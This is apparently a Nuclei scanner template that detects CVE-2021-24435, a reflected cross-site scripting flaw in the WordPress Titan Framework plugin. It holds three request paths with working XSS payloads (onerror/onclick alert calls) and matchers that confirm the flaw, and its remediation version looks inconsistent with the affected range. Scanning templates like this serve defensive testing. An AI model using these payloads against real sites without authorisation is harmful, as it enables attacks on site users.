56 lines
2.3 KiB
YAML
56 lines
2.3 KiB
YAML
id: CVE-2021-24435
|
|
|
|
info:
|
|
name: WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting
|
|
author: xcapri,ritikchaddha
|
|
severity: medium
|
|
description: |
|
|
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.
|
|
remediation: Fixed in version 2.7.12
|
|
reference:
|
|
- https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24435
|
|
- https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-24435
|
|
cwe-id: CWE-79
|
|
epss-score: 0.0014
|
|
epss-percentile: 0.49432
|
|
cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
vendor: gambit
|
|
product: titan_framework
|
|
framework: wordpress
|
|
tags: wp,xss,wp-plugin,titan-framework,wpscan,cve,cve2021,wordpress
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27"
|
|
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27"
|
|
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: regex
|
|
regex:
|
|
- (?i)(onerror=|onclick=)['"]?alert\(document\.domain\)['"]?
|
|
- '<p>Grumpy wizards make'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a004830460221009520e207a798498c4436f2eb4315a0cd962a41bd6958665705b91c157f4a3c6d022100811df242ef8ffc8303493f7be1dcee1df01d06040e8694b6e69e23ffe445b219:922c64590222798bb761d5b6d8e72950 |